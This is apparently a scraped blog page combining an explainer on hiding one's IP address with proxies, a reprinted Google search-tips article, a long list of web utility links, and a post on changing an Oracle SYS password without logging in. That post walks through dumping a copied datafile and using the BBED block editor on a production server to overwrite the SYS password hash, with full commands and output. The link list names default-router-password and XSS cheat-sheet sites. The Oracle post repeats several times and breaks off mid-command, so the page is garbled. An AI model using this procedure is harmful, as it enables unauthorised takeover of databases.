Friday, January 15, 2010

How do I hide my IP address?

AdSense Code

The most common method to hide your IP address is to use a proxy server in one form or another. A proxy server is a computer that offers a computer network service to allow clients to make indirect network connections to other network services. A client connects to the proxy server, then requests a connection, file, or other resource available on a different server. The proxy provides the resource either by connecting to the specified server or by serving it from a cache. In some cases, the proxy may alter the client's request or the server's response for various purposes.

There are several implementations of proxy servers that you can use to hide your IP address (in an attempt to remain anonymous on the internet):

Website Based Proxy Servers

A Website based proxy server is a website that provides a form for you to enter the URL of a website that you wish to anonymously visit. When you submit the form the website proxy server makes a request for the page that you want to visit. The machine usually does not identify itself as a proxy server and does not pass along your IP address in the request for the page. The features of these sites vary (ad blocking, javascript blocking, etc) as does their price. Some are free and some charge. Examples of website proxy services are:

o Proxify.com

Browser Configured Proxy Servers

There are also stand along proxy servers that allow for you to configure your browser to route your browser traffic through that machine, which then makes a request for a page on your behalf, and then sends you the results. These are usually used at no cost to the user. Since they are accessible to the public these are often quite slow. Please see instructions for using a proxy server. There are a variety of types of these proxy servers:

o Transparent Proxy - This type of proxy server identifies itself as a proxy server and also makes the original IP address available through the http headers. These are generally used for their ability to cache websites and do not effectively provide any anonymity to those who use them. However, the use of a transparent proxy will get you around simple IP bans. They are transparent in the terms that your IP address is exposed, not transparent in the terms that you do not know that you are using it (your system is not specifically configured to use it.) This type of proxy server does not hide your IP address.

o Anonymous Proxy - This type of proxy server identifies itself as a proxy server, but does not make the original IP address available. This type of proxy server is detectable, but provides reasonable anonymity for most users. This type of proxy server will hide your IP address.

o Distorting Proxy - This type of proxy server identifies itself as a proxy server, but make an incorrect original IP address available through the http headers. This type of proxy server will hide your IP address.

o High Anonymity Proxy - This type of proxy server does not identify itself as a proxy server and does not make available the original IP address. This type of proxy server will hide your IP address.

Installed Software Proxy Servers

There are a variety of companies and software packages available at either a one time cost or at an annual subscription. These are usually faster and more reliable than the above proxy servers. Some of these services would include:

o Anonymizer.com's Anonymous Surfing
o GhostSurf 2007 Platinum
o Hide My IP
o TOR (free)

Anonymous Proxy Risks

In using a proxy server (for example, anonymizing HTTP proxy), all data sent to the service being used (for example, HTTP server in a website) must pass through the proxy server before being sent to the service, mostly in unencrypted form. It is therefore possible, and has been demonstrated, for a malicious proxy server to record everything sent to the proxy: including unencrypted logins and passwords.

By chaining proxies which do not reveal data about the original requester, it is possible to obfuscate activities from the eyes of the user's destination. However, more traces will be left on the intermediate hops, which could be used or offered up to trace the user's activities. If the policies and administrators of these other proxies are unknown, the user may fall victim to a false sense of security just because those details are out of sight and mind.

The bottom line of this is to be wary when using proxy servers, and only use proxy servers of known integrity (e.g., the owner is known and trusted, has a clear privacy policy, etc.), and never use proxy servers of unknown integrity. If there is no choice but to use unknown proxy servers, do not pass any private information (unless it is properly encrypted) through the proxy.

AdSense Code

Tuesday, September 30, 2008

Great Google Secrets

AdSense Code

20 Great Google Secrets

http://www.pcmag.com/article2/0,4149,1306756,00.asp

excl.gif No Active Links, Read the Rules - Edit by Ninja excl.gif

Google is clearly the best general-purpose search engine on the Web (see

www.pcmag.com/searchengines

But most people don't use it to its best advantage. Do you just plug in a keyword or two and hope for the best? That may be the quickest way to search, but with more than 3 billion pages in Google's index, it's still a struggle to pare results to a manageable number.

But Google is an remarkably powerful tool that can ease and enhance your Internet exploration. Google's search options go beyond simple keywords, the Web, and even its own programmers. Let's look at some of Google's lesser-known options.

Syntax Search Tricks

Using a special syntax is a way to tell Google that you want to restrict your searches to certain elements or characteristics of Web pages. Google has a fairly complete list of its syntax elements at

www.google.com/help/operators.html

. Here are some advanced operators that can help narrow down your search results.

Intitle: at the beginning of a query word or phrase (intitle:"Three Blind Mice") restricts your search results to just the titles of Web pages.

Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you're searching for might commonly appear in URLs. If you're looking for the term HTML, for example, and you don't want to get results such as

www.mysite.com/index.html

, you can enter intext:html.

Link: lets you see which pages are linking to your Web page or to another page you're interested in. For example, try typing in

link:http://www.pcmag.com

Try using site: (which restricts results to top-level domains) with intitle: to find certain types of pages. For example, get scholarly pages about Mark Twain by searching for intitle:"Mark Twain"site:edu. Experiment with mixing various elements; you'll develop several strategies for finding the stuff you want more effectively. The site: command is very helpful as an alternative to the mediocre search engines built into many sites.

Swiss Army Google

Google has a number of services that can help you accomplish tasks you may never have thought to use Google for. For example, the new calculator feature

(www.google.com/help/features.html#calculator)

lets you do both math and a variety of conversions from the search box. For extra fun, try the query "Answer to life the universe and everything."

Let Google help you figure out whether you've got the right spelling—and the right word—for your search. Enter a misspelled word or phrase into the query box (try "thre blund mise") and Google may suggest a proper spelling. This doesn't always succeed; it works best when the word you're searching for can be found in a dictionary. Once you search for a properly spelled word, look at the results page, which repeats your query. (If you're searching for "three blind mice," underneath the search window will appear a statement such as Searched the web for "three blind mice.") You'll discover that you can click on each word in your search phrase and get a definition from a dictionary.

Suppose you want to contact someone and don't have his phone number handy. Google can help you with that, too. Just enter a name, city, and state. (The city is optional, but you must enter a state.) If a phone number matches the listing, you'll see it at the top of the search results along with a map link to the address. If you'd rather restrict your results, use rphonebook: for residential listings or bphonebook: for business listings. If you'd rather use a search form for business phone listings, try Yellow Search

(www.buzztoolbox.com/google/yellowsearch.shtml).

Extended Googling

Google offers several services that give you a head start in focusing your search. Google Groups

(http://groups.google.com)

indexes literally millions of messages from decades of discussion on Usenet. Google even helps you with your shopping via two tools: Froogle
CODE
(http://froogle.google.com),

which indexes products from online stores, and Google Catalogs
CODE
(http://catalogs.google.com),

which features products from more 6,000 paper catalogs in a searchable index. And this only scratches the surface. You can get a complete list of Google's tools and services at

www.google.com/options/index.html

You're probably used to using Google in your browser. But have you ever thought of using Google outside your browser?

Google Alert

(www.googlealert.com)

monitors your search terms and e-mails you information about new additions to Google's Web index. (Google Alert is not affiliated with Google; it uses Google's Web services API to perform its searches.) If you're more interested in news stories than general Web content, check out the beta version of Google News Alerts

(www.google.com/newsalerts).

This service (which is affiliated with Google) will monitor up to 50 news queries per e-mail address and send you information about news stories that match your query. (Hint: Use the intitle: and source: syntax elements with Google News to limit the number of alerts you get.)

Google on the telephone? Yup. This service is brought to you by the folks at Google Labs

(http://labs.google.com),

a place for experimental Google ideas and features (which may come and go, so what's there at this writing might not be there when you decide to check it out). With Google Voice Search

(http://labs1.google.com/gvs.html),

you dial the Voice Search phone number, speak your keywords, and then click on the indicated link. Every time you say a new search term, the results page will refresh with your new query (you must have JavaScript enabled for this to work). Remember, this service is still in an experimental phase, so don't expect 100 percent success.

In 2002, Google released the Google API (application programming interface), a way for programmers to access Google's search engine results without violating the Google Terms of Service. A lot of people have created useful (and occasionally not-so-useful but interesting) applications not available from Google itself, such as Google Alert. For many applications, you'll need an API key, which is available free from
CODE
www.google.com/apis

. See the figures for two more examples, and visit

www.pcmag.com/solutions

for more.

Thanks to its many different search properties, Google goes far beyond a regular search engine. Give the tricks in this article a try. You'll be amazed at how many different ways Google can improve your Internet searching.

Online Extra: More Google Tips

Here are a few more clever ways to tweak your Google searches.

Search Within a Timeframe

Daterange: (start date–end date). You can restrict your searches to pages that were indexed within a certain time period. Daterange: searches by when Google indexed a page, not when the page itself was created. This operator can help you ensure that results will have fresh content (by using recent dates), or you can use it to avoid a topic's current-news blizzard and concentrate only on older results. Daterange: is actually more useful if you go elsewhere to take advantage of it, because daterange: requires Julian dates, not standard Gregorian dates. You can find converters on the Web (such as

CODE
http://aa.usno.navy.mil/data/docs/JulianDate.html

excl.gif No Active Links, Read the Rules - Edit by Ninja excl.gif

), but an easier way is to do a Google daterange: search by filling in a form at

www.researchbuzz.com/toolbox/goofresh.shtml or www.faganfinder.com/engines/google.shtml

. If one special syntax element is good, two must be better, right? Sometimes. Though some operators can't be mixed (you can't use the link: operator with anything else) many can be, quickly narrowing your results to a less overwhelming number.

More Google API Applications

Staggernation.com offers three tools based on the Google API. The Google API Web Search by Host (GAWSH) lists the Web hosts of the results for a given query

(www.staggernation.com/gawsh/).

When you click on the triangle next to each host, you get a list of results for that host. The Google API Relation Browsing Outliner (GARBO) is a little more complicated: You enter a URL and choose whether you want pages that related to the URL or linked to the URL

(www.staggernation.com/garbo/).

Click on the triangle next to an URL to get a list of pages linked or related to that particular URL. CapeMail is an e-mail search application that allows you to send an e-mail to google@capeclear.com with the text of your query in the subject line and get the first ten results for that query back. Maybe it's not something you'd do every day, but if your cell phone does e-mail and doesn't do Web browsing, this is a very handy address to know.

AdSense Code

What, What's New, Check it here and feel Excited

AdSense Code

http://sabsebolo.com/

FREE Conferencing services

+91 (0)22-3980-4444

Instant access from any land line or mobile device.
Crystal Clear all digital connections.
Secure and private.
Available on demand, 24/7.
Account never expires.
Dedicated number never expires.
Conference up to 10 callers.

http://sabsebolo.com/

Search Tools

compere results from google/yahoo/msn
http://www.jux2.com

search Ur mood n fashion in oses own Trend
http://mindset.research.yahoo.com/
*
good image search with animations
http://www.netvue.com
*
answer engine : actually finds answers to your questions posed in plain English as opposed to directing you to pages that simply mention the questions.
http://www.brainboost.com
http://www.hakia.com
*
compilation of Search !! I Use this!!
http://www.sputtr.com/
*
Comprehensive Precise search
http://directory.google.com
*
compere yahoo & google same time
http://www.gahooyoogle.com
*
Search the largest database of frequently asked questions.
http://querycat.com/
*
search every bit of google
http://lloydi.com/blog/simplygoogleoriginal.htm
*
search engine
http://www.dogpile.com
*
multiple search engine links
http://mrquery.com/
*
great google search tool
http://www.googlepowersearch.com

Powerful Internet Utilities

*
Make Your own Orkut
http://www.ning.com

*
send large files 100 MB
http://www.mediafire.com/ [best]
http://www.mailbigfile.com/
http://www.dropsend.com/
*
Best Home page
http://www.netvibes.com/
http://www.pageflakes.com/
*
Copy n paste between computers
http://cl1p.net/
*
Sticky notes for the web
http://www.mystickies.com/
http://www.stikkit.com/
*
calendar services reminder
http://www.hipcal.com
http://www.calendarhub.com/
*
Receive free email on ur name
http://www.dodgeit.com/
*
Convert image to ASCII
www.asciiconvert.com
*
Presentation impressions
http://www.empressr.com/
*
real time collaboration for ideas
http://thinkature.com/
*
Get Organised
http://www.backpackit.com/
http://www.calendarhub.com/
*
Free Open DNS fast surfing
http://www.opendns.com/faq/
*
Everything about time n date
http://www.timeanddate.com/
*
Send 1GB attachments Personal P2p
http://www.pando.com/how_it_works
*
Your Own Spambox
http://spambox.us/
*
Internet Office suite
http://us.ajax13.com/en/ajaxwrite/
http://www.zoho.com/
http://numsum.com/ spreadsheats
*
Suggested Meeting Inteligence
http://www.meetwithapproval.com/
*
Scraps of internet
http://www.netscrap.com
*
.EXE or zip file search engine
http://www.filemirrors.com/
*
Drawin flowcharts, diagrams
http://www.gliffy.com/
*
Good Links Compiled
http://www.reporter.org/desktop/
*
Watch ny webPage all the time
http://www.notifyr.org/
http://www.watchthatpage.com/tutorial.jsp
*
bookmark synchronyser bet 2 computers
http://www.foxmarks.com/
*
Recorded e mail
http://www.fuzzmail.org/
*
Virtual Desktop
http://sapotek.com/ 1GB storage FREE
*
Map View as in ur house .. nt good for india
http://www.yourgmap.com
*
The latest websites
http://www.webapplist.com/
*
Online file Conversion
http://www.zamzar.com/
*
Remove Objects From Photos
http://www.snapmania.com/info/en/trm/
*
Resize ur Inages
http://quickthumbnail.com/
*
Video Download
http://www.videodownloader.info/]
http://video.qooqle.jp/dl/
*
choose the color scheme of your own website.
http://createafreewebsite.net/html-color-tool.html
*
fake e mail
http://deadfake.com/
*
Customize home page n internet
http://www.pageflakes.com/
*
25 Gb online storage free
http://www.mediamax.com/
*
Add Chatbox to site or Blog
http://www.chatcreator.com/chatbox/
*
Self distructing email
http://www.selfdestructing.com/selfdestructing/faq.asp
*
printer anywhere
http://www.printeranywhere.com/download.sdf
*
Save Flash online
http://www.browsertools.net/Flash-Saving-Plugin/firefox.html
*
Spellchecker
http://www.spellify.com/
*
Answers to ur questions
http://www.nownow.com/nownow/index.jsp
*
Tons of widget
http://www.musestorm.com/widgets/central.jsp
*
check ur net speed
http://www.internetfrog.com/mypc/speedtest/
*
Online dictionary
http://www.metaglossary.com
*
Alarm online
http://tehcompany.com/toys/yr-alarm/
*
Fake Cover Page
http://www.funonit.com/funny_jokes/fake_magazine?
*
Ip adress wid location teller
http://www.ipandroid.com/mediumlmap.php
*
Send a File 100 MB
http://www.yousendit.com/
*
Random File exchange
http://www.file-swap.com/
*
Windows cant erase file in use
http://www.dr-hoiby.com/WhoLockMe/
*
Good Podcast
http://www.ourmedia.org/
*

default router passwords
http://www.routerpasswords.com/
*
security books download
http://www.rootsecure.net/content/downloads/pdf/?C=S;O=A
*
http://www.virangar.org/Tutorial/E-Book-Orginal/
*
http://ha.ckers.org/xss.html cross scripting website
*
http://www.informationleak.net/
*
http://www.hackerwatch.org/probe/
*
http://www.hack-test.com/

AdSense Code

http://sabsebolo.com/

FREE Conferencing services

+91 (0)22-3980-4444

Instant access from any land line or mobile device.
Crystal Clear all digital connections.
Secure and private.
Available on demand, 24/7.
Account never expires.
Dedicated number never expires.
Conference up to 10 callers.

http://sabsebolo.com/

Search Tools

Powerful Internet Utilities

AdSense Code

http://sabsebolo.com/

FREE Conferencing services

+91 (0)22-3980-4444

Instant access from any land line or mobile device.
Crystal Clear all digital connections.
Secure and private.
Available on demand, 24/7.
Account never expires.
Dedicated number never expires.
Conference up to 10 callers.

http://sabsebolo.com/

Search Tools

Powerful Internet Utilities

Tuesday, January 29, 2008

“Fixing” SYS for hacking purposes - Change Oracle SYS password

AdSense Code

How to change Oracle SYS password without having to login into a database? Possible?

Yes. All you need is some knowledge about Oracle internals.

This document is to be used only for testing purposes and not to be used in production environment. Purpose is to show audience how hackers can gain access to your system without knowing it and how to prevent it.

As I said earlier I am not going to use SQL to access production database. In order to get necessary information about SYS user I will copy production system datafile to my test server using rcp, sftp or any other utility (assumption here is that we already have gained access to database server).

Using my test Oracle instance and alter system dump datafile command I will get formatted dump datafile.

Dumping more blocks at once will speed up the whole process since I do not know which Oracle block has password hash value for user SYS.

Command used to dump more blocks at once :

alter system dump datafile block min block max ;

Eg.

alter system dump datafile '/ora-main/oradata/test/data/system_01.dbf' block min 1 block max 60;

Dump can be performed with instance in nomunt state and trace file will be located under user dump directory.

NOTE: For more information on Oracle dumps, please check my previous paper named “ Oradebug – Undocumented Oracle Utility “.

Formatted dump has all values needed to modify current SYS password on production server. We need three values below:

1) PASSWORD HASH VALUE

2) RDBA

Each block of an Oracle data file is formatted with a fixed header that

contains information about the particular block. This information provides a

means to ensure the integrity for each block and in turn, the entire Oracle

database. One component of the fixed header of a data block is called a Relative

Data Block Address (DBA). This DBA is a 4 bytes that stores the relative file

number of the Oracle database file and the Oracle block number offset relative

to the beginning of the file. (Presley, 1993).

How RDBA is mapped:

e.g.

rdba: 0x0b52fbf6 (45/1244150)

Bin mode representation of these numbers might give you a clue:

0b52fbf6 1011010100101111101111110110

1244150 100101111101111110110

45 101101

3) OFFSET - The offset is relative to the block already set.

I am not going into great details how to find these values. There is a way to do it and all you need knowledge about Oracle internals but do not try it unless you know what are you doing.

Here is excerpt from formatted block. Important values are highlighted:

-----------------------------------------------------------------------------------------------------

buffer rdba: 0x00400036 (1/54) RDBA

scn: 0x0000.00070afd seq: 0x01 flg: 0x06 tail: 0x0afd0601

frmt: 0x02 chkval: 0x97e0 type: 0x06=trans data

tab 1, row 1, @0x18f5 - OFFSET

col 1: [ 2] c1 02

col 2: [16] 34 44 45 34 32 37 39 35 45 36 36 31 31 37 41 45 (Password hash value )

col 3: [ 1] 80

col 4: [ 1] 80

col 5: [ 7] 78 69 0b 0a 11 19 2a

col 6: [ 7] 78 69 0c 1b 11 09 03

col 7: *NULL*

col 8: *NULL*

col 9: [ 1] 80

col 10: *NULL*

col 11: [ 2] c1 02

--------------------------------------------------------------------------------------------------------

It’s time to pick a new SYS password. Again, using my test database I will generate new password hash value.

SQL> alter user sys identified by testpass;

User altered.

SQL> select password from dba_users where username='SYS';

PASSWORD

------------------------------

E2A109347F6C7832

This hash value will be used for a new password.

You all know the trick how to temporary change user password and return it back using same password hash value:

e.g. alter user sys identified by values ‘E2A109347F6C7832’;

Big question left: how to change password hash value on production database server without having to login into a database? In this case my choice is BBED (Block Browser Editor). This is Oracle internal tool used to modify data blocks. It has been around for a while. It’s still there in release 10.2. BBED is password protected but unfortunately with a very weak password.

More information about this tool you can find in a reference [2] .

The following scenario is happening on production database server.

BBED> info

File# Name Size(blks)

----- ---- ----------

1 /ora-main/oradata/test/data/system_01.dbf 256004

The RDBA, offset and password hash value is already known.

BBED> set file 1

FILE# 1

BBED> set block 54

BLOCK# 54

BBED> set offset 6389

OFFSET 6389

BBED> p kdbr

sb2 kdbr[0] @118 8074

sb2 kdbr[1] @120 8009

-----------------------------------------------------------

sb2 kdbr[20] @158 5965

sb2 kdbr[21] @160 8030

sb2 kdbr[22] @162 6389 - offset ( 0x18f5 )

sb2 kdbr[23] @164 7838

BBED> p*kdbr[22]

rowdata[561]

------------

ub1 rowdata[561] @6481 0x6c

BBED> x/r

rowdata[561] @6481

------------

flag@6481: 0x6c (KDRHFL, KDRHFF, KDRHFH, KDRHFC)

lock@6482: 0x00

cols@6483: 17

ckix@6484: 1

col 1[2] @6489: 0xc1 0x02

col 2[16] @6492: 0x34 0x44 0x45 0x34 0x32 0x37 0x39 0x35 0x45 0x36

0x36 0x31 0x31 0x37 0x41 0x45

col 3[1] @6509: 0x80

col 4[1] @6511: 0x80

col 5[7] @6513: 0x78 0x69 0x0b 0x0a 0x11 0x19 0x2a

col 6[7] @6521: 0x78 0x69 0x0c 0x1b 0x11 0x09 0x03

BBED> x/rn2cntn ( this command will show rows )

rowdata[561] @6481

------------

flag@6481: 0x6c (KDRHFL, KDRHFF, KDRHFH, KDRHFC)

lock@6482: 0x00

cols@6483: 17

ckix@6484: 1

col 1[2] @6489: Á.

col 2[16] @6492: 4DE42795E66117AE (34 44 45 34 32 37 39 35 45 36 36 31 31 37 41 45

col 3[1] @6509: 0

col 4[1] @6511: 0x80

col 5[7] @6513: -0

col 6[7] @6521: -0

Dump file to be sure that you are editing correct data:

BBED> dump/v dba 1,54 offset 6389 count 150

File: /ora-main/oradata/test/data/system_01.dbf (1)

Block: 54 Offsets: 6389 to 6538 Dba:0x00400036

-----------------------------------------------------------------------------------------------------------

01800180 0778690b 160f3a11 ffffff01 80ff02c1 02ffff01 80018016 44454641 l .....xi...:........Á........DEFA554c545f 434f4e53 554d4552 5f47524f 5550ac00 01000100 01004000 36001000 l ULT_CONSUMER_GROUP¬.......@.6...40003600 1002c111 6c000705 01800180 03c20346 01800180 01800180 6c001101 l@.6...Á.l........Â.F........l...

03535953 02c10210 34444534 32373935 45363631 31374145 01800180 0778690b l .SYS.Á..4DE42795E66117AE.....xi.0a11192a 0778690c 1b110903 ffff0180 ff02c102

Find correct offset:

BBED> find /c 4DE42795E66117AE

File: /ora-main/oradata/test/data/testsystem_01.dbf (1)

Block: 54 Offsets: 6493 to 6508 Dba:0x00400036

------------------------------------------------------------------------------------------------------------

34444534 32373935 45363631 31374145

<48>

Offset for a this string is 6493.One more checkup before modifying:

BBED> dump/v dba 1,54 offset 6493 count 16

File: /ora-main/oradata/test/data/testsystem_01.dbf (1)

Block: 54 Offsets: 6493 to 6508 Dba:0x00400036

-----------------------------------------------------------------------------------------------------------

34444534 32373935 45363631 31374145 l 4DE42795E66117AE

Now I am positive that this is an offset that needs to be modified.

I will modify block using password hash value ( E2A109347F6C7832 ) previously generated on my test database;

BBED> modify/c E2A109347F6C7832 dba 1,54 offset 6493

Warning: contents of previous BIFILE will be lost. Proceed? (Y/N) y

File: /ora-main/oradata/test/data/testsystem_01.dbf (1)

Block: 54 Offsets: 6493 to 6508 Dba:0x00400036

------------------------------------------------------------------------

45324131 30393334 37463643 37383332

Dump block to acknowledge change:

BBED> dump/v dba 1,54 offset 6493 count 16

File: /ora-main/oradata/test/data/testsystem_01.dbf (1)

Block: 54 Offsets: 6493 to 6508 Dba:0x00400036

-----------------------------------------------------------------------------------------------------------

45324131 30393334 37463643 37383332 l E2A109347F6C7832

Change is there. And finally apply changes to the block:

BBED> sum dba 1,54

Check value for File 1, Block 54:

current = 0x97e0, required = 0x919b

BBED> sum dba 1,54 apply

Check value for File 1, Block 54:

current = 0x919b, required = 0x919b

It’s time to test new password. Login into production database using new password:

SQL> conn sys/testpass

Connected.

And select confirms new password hash value:

SQL> select password from dba_users where username='SYS';

PASSWORD

E2A109347F6C7832

Conclusion

To conclude, to damage you production system hacker can use power of BBED in combination with knowledge of Oracle internals. Hopefully Oracle will better protect access to this tool or completely remove from future releases.

No liability for the contents of these documents can be accepted. Use the concepts, examples and other content at your own risk. As this is a first version, there may be errors and inaccuracies that may of course be damaging to your system. Proceed with caution, and although this is highly unlikely, the author does not take any responsibility for that.

References

[1] Oradebug – Undocumented Oracle Utility - Miladin Modrakovic

[2] Disassembling the Oracle Date Block - Graham Thornton

AdSense Code

How to change Oracle SYS password without having to login into a database? Possible?

Yes. All you need is some knowledge about Oracle internals.

Using my test Oracle instance and alter system dump datafile command I will get formatted dump datafile.

Dumping more blocks at once will speed up the whole process since I do not know which Oracle block has password hash value for user SYS.

Command used to dump more blocks at once :

alter system dump datafile block min block max ;

Eg.

alter system dump datafile '/ora-main/oradata/test/data/system_01.dbf' block min 1 block max 60;

Dump can be performed with instance in nomunt state and trace file will be located under user dump directory.

NOTE: For more information on Oracle dumps, please check my previous paper named “ Oradebug – Undocumented Oracle Utility “.

Formatted dump has all values needed to modify current SYS password on production server. We need three values below:

1) PASSWORD HASH VALUE

2) RDBA

Each block of an Oracle data file is formatted with a fixed header that

contains information about the particular block. This information provides a

means to ensure the integrity for each block and in turn, the entire Oracle

database. One component of the fixed header of a data block is called a Relative

Data Block Address (DBA). This DBA is a 4 bytes that stores the relative file

number of the Oracle database file and the Oracle block number offset relative

to the beginning of the file. (Presley, 1993).

How RDBA is mapped:

e.g.

rdba: 0x0b52fbf6 (45/1244150)

Bin mode representation of these numbers might give you a clue:

0b52fbf6 1011010100101111101111110110

1244150 100101111101111110110

45 101101

3) OFFSET - The offset is relative to the block already set.

I am not going into great details how to find these values. There is a way to do it and all you need knowledge about Oracle internals but do not try it unless you know what are you doing.

Here is excerpt from formatted block. Important values are highlighted:

-----------------------------------------------------------------------------------------------------

buffer rdba: 0x00400036 (1/54) RDBA

scn: 0x0000.00070afd seq: 0x01 flg: 0x06 tail: 0x0afd0601

frmt: 0x02 chkval: 0x97e0 type: 0x06=trans data

tab 1, row 1, @0x18f5 - OFFSET

col 1: [ 2] c1 02

col 2: [16] 34 44 45 34 32 37 39 35 45 36 36 31 31 37 41 45 (Password hash value )

col 3: [ 1] 80

col 4: [ 1] 80

col 5: [ 7] 78 69 0b 0a 11 19 2a

col 6: [ 7] 78 69 0c 1b 11 09 03

col 7: *NULL*

col 8: *NULL*

col 9: [ 1] 80

col 10: *NULL*

col 11: [ 2] c1 02

--------------------------------------------------------------------------------------------------------

It’s time to pick a new SYS password. Again, using my test database I will generate new password hash value.

SQL> alter user sys identified by testpass;

User altered.

SQL> select password from dba_users where username='SYS';

PASSWORD

------------------------------

E2A109347F6C7832

This hash value will be used for a new password.

You all know the trick how to temporary change user password and return it back using same password hash value:

e.g. alter user sys identified by values ‘E2A109347F6C7832’;

More information about this tool you can find in a reference [2] .

The following scenario is happening on production database server.

BBED> info

File# Name Size(blks)

----- ---- ----------

1 /ora-main/oradata/test/data/system_01.dbf 256004

The RDBA, offset and password hash value is already known.

BBED> set file 1

FILE# 1

BBED> set block 54

BLOCK# 54

BBED> set offset 6389

OFFSET 6389

BBED> p kdbr

sb2 kdbr[0] @118 8074

sb2 kdbr[1] @120 8009

-----------------------------------------------------------

sb2 kdbr[20] @158 5965

sb2 kdbr[21] @160 8030

sb2 kdbr[22] @162 6389 - offset ( 0x18f5 )

sb2 kdbr[23] @164 7838

BBED> p*kdbr[22]

rowdata[561]

------------

ub1 rowdata[561] @6481 0x6c

BBED> x/r

rowdata[561] @6481

------------

flag@6481: 0x6c (KDRHFL, KDRHFF, KDRHFH, KDRHFC)

lock@6482: 0x00

cols@6483: 17

ckix@6484: 1

col 1[2] @6489: 0xc1 0x02

col 2[16] @6492: 0x34 0x44 0x45 0x34 0x32 0x37 0x39 0x35 0x45 0x36

0x36 0x31 0x31 0x37 0x41 0x45

col 3[1] @6509: 0x80

col 4[1] @6511: 0x80

col 5[7] @6513: 0x78 0x69 0x0b 0x0a 0x11 0x19 0x2a

col 6[7] @6521: 0x78 0x69 0x0c 0x1b 0x11 0x09 0x03

BBED> x/rn2cntn ( this command will show rows )

rowdata[561] @6481

------------

flag@6481: 0x6c (KDRHFL, KDRHFF, KDRHFH, KDRHFC)

lock@6482: 0x00

cols@6483: 17

ckix@6484: 1

col 1[2] @6489: Á.

col 2[16] @6492: 4DE42795E66117AE (34 44 45 34 32 37 39 35 45 36 36 31 31 37 41 45

col 3[1] @6509: 0

col 4[1] @6511: 0x80

col 5[7] @6513: -0

col 6[7] @6521: -0

Dump file to be sure that you are editing correct data:

BBED> dump/v dba 1,54 offset 6389 count 150

File: /ora-main/oradata/test/data/system_01.dbf (1)

Block: 54 Offsets: 6389 to 6538 Dba:0x00400036

-----------------------------------------------------------------------------------------------------------

03535953 02c10210 34444534 32373935 45363631 31374145 01800180 0778690b l .SYS.Á..4DE42795E66117AE.....xi.0a11192a 0778690c 1b110903 ffff0180 ff02c102

Find correct offset:

BBED> find /c 4DE42795E66117AE

File: /ora-main/oradata/test/data/testsystem_01.dbf (1)

Block: 54 Offsets: 6493 to 6508 Dba:0x00400036

------------------------------------------------------------------------------------------------------------

34444534 32373935 45363631 31374145

<48>

Offset for a this string is 6493.One more checkup before modifying:

BBED> dump/v dba 1,54 offset 6493 count 16

File: /ora-main/oradata/test/data/testsystem_01.dbf (1)

Block: 54 Offsets: 6493 to 6508 Dba:0x00400036

-----------------------------------------------------------------------------------------------------------

34444534 32373935 45363631 31374145 l 4DE42795E66117AE

Now I am positive that this is an offset that needs to be modified.

I will modify block using password hash value ( E2A109347F6C7832 ) previously generated on my test database;

BBED> modify/c E2A109347F6C7832 dba 1,54 offset 6493

Warning: contents of previous BIFILE will be lost. Proceed? (Y/N) y

File: /ora-main/oradata/test/data/testsystem_01.dbf (1)

Block: 54 Offsets: 6493 to 6508 Dba:0x00400036

------------------------------------------------------------------------

45324131 30393334 37463643 37383332

Dump block to acknowledge change:

BBED> dump/v dba 1,54 offset 6493 count 16

File: /ora-main/oradata/test/data/testsystem_01.dbf (1)

Block: 54 Offsets: 6493 to 6508 Dba:0x00400036

-----------------------------------------------------------------------------------------------------------

45324131 30393334 37463643 37383332 l E2A109347F6C7832

Change is there. And finally apply changes to the block:

BBED> sum dba 1,54

Check value for File 1, Block 54:

current = 0x97e0, required = 0x919b

BBED> sum dba 1,54 apply

Check value for File 1, Block 54:

current = 0x919b, required = 0x919b

It’s time to test new password. Login into production database using new password:

SQL> conn sys/testpass

Connected.

And select confirms new password hash value:

SQL> select password from dba_users where username='SYS';

PASSWORD

E2A109347F6C7832

Conclusion

References

[1] Oradebug – Undocumented Oracle Utility - Miladin Modrakovic

[2] Disassembling the Oracle Date Block - Graham Thornton

AdSense Code

How to change Oracle SYS password without having to login into a database? Possible?

Yes. All you need is some knowledge about Oracle internals.

Using my test Oracle instance and alter system dump datafile command I will get formatted dump datafile.

Dumping more blocks at once will speed up the whole process since I do not know which Oracle block has password hash value for user SYS.

Command used to dump more blocks at once :

alter system dump datafile block min block max ;

Eg.

alter system dump datafile '/ora-main/oradata/test/data/system_01.dbf' block min 1 block max 60;

Dump can be performed with instance in nomunt state and trace file will be located under user dump directory.

NOTE: For more information on Oracle dumps, please check my previous paper named “ Oradebug – Undocumented Oracle Utility “.

Formatted dump has all values needed to modify current SYS password on production server. We need three values below:

1) PASSWORD HASH VALUE

2) RDBA

Each block of an Oracle data file is formatted with a fixed header that

contains information about the particular block. This information provides a

means to ensure the integrity for each block and in turn, the entire Oracle

database. One component of the fixed header of a data block is called a Relative

Data Block Address (DBA). This DBA is a 4 bytes that stores the relative file

number of the Oracle database file and the Oracle block number offset relative

to the beginning of the file. (Presley, 1993).

How RDBA is mapped:

e.g.

rdba: 0x0b52fbf6 (45/1244150)

Bin mode representation of these numbers might give you a clue:

0b52fbf6 1011010100101111101111110110

1244150 100101111101111110110

45 101101

3) OFFSET - The offset is relative to the block already set.

I am not going into great details how to find these values. There is a way to do it and all you need knowledge about Oracle internals but do not try it unless you know what are you doing.

Here is excerpt from formatted block. Important values are highlighted:

-----------------------------------------------------------------------------------------------------

buffer rdba: 0x00400036 (1/54) RDBA

scn: 0x0000.00070afd seq: 0x01 flg: 0x06 tail: 0x0afd0601

frmt: 0x02 chkval: 0x97e0 type: 0x06=trans data

tab 1, row 1, @0x18f5 - OFFSET

col 1: [ 2] c1 02

col 2: [16] 34 44 45 34 32 37 39 35 45 36 36 31 31 37 41 45 (Password hash value )

col 3: [ 1] 80

col 4: [ 1] 80

col 5: [ 7] 78 69 0b 0a 11 19 2a

col 6: [ 7] 78 69 0c 1b 11 09 03

col 7: *NULL*

col 8: *NULL*

col 9: [ 1] 80

col 10: *NULL*

col 11: [ 2] c1 02

--------------------------------------------------------------------------------------------------------

It’s time to pick a new SYS password. Again, using my test database I will generate new password hash value.

SQL> alter user sys identified by testpass;

User altered.

SQL> select password from dba_users where username='SYS';

PASSWORD

------------------------------

E2A109347F6C7832

This hash value will be used for a new password.

You all know the trick how to temporary change user password and return it back using same password hash value:

e.g. alter user sys identified by values ‘E2A109347F6C7832’;

More information about this tool you can find in a reference [2] .

The following scenario is happening on production database server.

BBED> info

File# Name Size(blks)

----- ---- ----------

1 /ora-main/oradata/test/data/system_01.dbf 256004

The RDBA, offset and password hash value is already known.

BBED> set file 1

